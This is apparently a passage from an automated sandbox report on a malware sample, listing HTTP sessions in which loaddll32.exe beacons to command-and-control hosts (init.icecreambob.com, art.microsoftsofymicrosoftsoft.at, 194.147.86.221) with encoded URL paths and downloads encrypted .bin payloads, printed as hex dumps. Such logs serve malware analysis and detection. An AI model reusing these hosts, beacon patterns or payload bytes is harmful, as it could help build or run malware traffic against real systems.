                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.449779194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:20.827048063 CEST2263OUTGET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.292851925 CEST2265INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e32053f1dd.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.449780194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:20.886424065 CEST2264OUTGET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.568727970 CEST2268INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e320583a02.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.449781194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:23.671128988 CEST2525OUTGET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:24.126127005 CEST2527INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:24 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3208164af.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.449862194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:34:00.834180117 CEST10309OUTGET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:01.322679043 CEST10310INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.449863194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:34:10.121752024 CEST10311OUTPOST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Content-Length: 2
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:10.640894890 CEST10311INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 146
                                                          Connection: close
                                                          Vary: Accept-Encoding
